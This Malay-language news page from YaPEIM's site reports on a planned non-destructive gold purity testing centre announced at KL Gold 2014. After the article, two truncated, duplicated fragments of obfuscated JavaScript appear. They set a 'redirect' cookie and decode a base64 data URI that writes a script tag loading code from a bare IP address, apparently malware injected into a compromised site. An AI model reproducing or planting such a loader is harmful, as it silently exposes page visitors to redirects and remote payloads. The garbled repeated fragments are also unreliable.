YaPEIM » YaPEIM Tubuhkan Pusat Pencerakinan Emas

Terkini

YaPEIM Tubuhkan Pusat Pencerakinan Emas

Majlis Perasmian KL Gold 2014 yang dirasmikan oleh YB Perdana Menteri Malaysia di KLCC

KUALA LUMPUR 29 Ogos – Yayasan Pembangunan Ekonomi Islam Malaysia (Yapeim) akan menubuhkan Pusat Pencerakinan Emas Tidak Memusnah yang akan menjadi pusat rujukan bagi memastikan tahap ketulenan emas selewat-lewatnya hujung tahun ini.

Menteri di Jabatan Perdana Menteri, Datuk Seri Jamil Khir Baharom berkata, pusat itu akan dilengkapi dengan pelbagai alat pengesan berteknologi tinggi bernilai RM45 juta hasil inovasi Yapeim.

Kata beliau, alat tersebut mampu menembusi ketebalan sehingga 12 kilogram emas bagi mengetahui kandungan unsur logam lain yang dimasukkan dalam jongkong emas tanpa perlu meleburkan atau me- rosakkan rupa bentuk asal.

“Kebanyakan pengguna sering tertipu ketika membeli emas kerana kandungannya tidak seratus peratus bahan galian bernilai itu.

“Menerusi alat ini, ia boleh membantu orang ramai atau pihak industri untuk menguji ketulenan bagi mengetahui kandungan sebenar dalam jongkong emas melalui kaedah tanpa dileburkan terlebih dahulu,” katanya.

Beliau berkata demikian kepada pemberita selepas majlis pelancaran Seminar dan Pameran Emas Kuala Lumpur (KL Gold) 2014 yang dirasmikan oleh Perdana Menteri, Datuk Seri Najib Tun Razak di sini hari ini.

Yang turut hadir Ketua Pengarah Jabatan Kemajuan Islam Malaysia (Jakim), Datuk Othman Mustapha; Presiden dan Pengerusi Lembaga Pemegang Amanah Yapeim, Datuk Abd. Malek Awang Kechil dan Ketua Pengarah Yapeim, Datuk Abibullah Samsuddin.

Terdahulu, ketika berucap dalam majlis itu, Jamil Khir berkata, satu kajian lebih serius perlu dijalankan bagi mengoptimumkan kedudukan emas sebagai bahan galian bernilai yang mempunyai ciri-ciri dan keunikan tersendiri.

Jelas beliau, untuk mencapai matlamat itu, beberapa langkah perlu dilaksanakan untuk memastikan kelestarian pertumbuhan nilai emas pada masa depan.

Menurutnya, antara langkah itu ialah memastikan kestabilan nilai sebenar wang dapat dipertahankan dengan mengekang faktor penyebab inflasi selain memperkasakan peranan emas sebagai pengukur nilai.

“Selain itu, teknologi terkini berkaitan emas perlu diterokai bagi mengimbangi pengeluaran dan permintaan emas dengan menggunakan kaedah berkesan untuk mengurangkan kos pengeluaran.

“Bagi memastikan strategi untuk memanfaatkan emas sebagai kaedah simpanan, pelaburan dan alat pengukur nilai mata wang tanpa terdedah kepada penipuan ketulenannya, maka peralatan teknologi terkini perlu dibangunkan,” katanya. – UTUSAN-

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top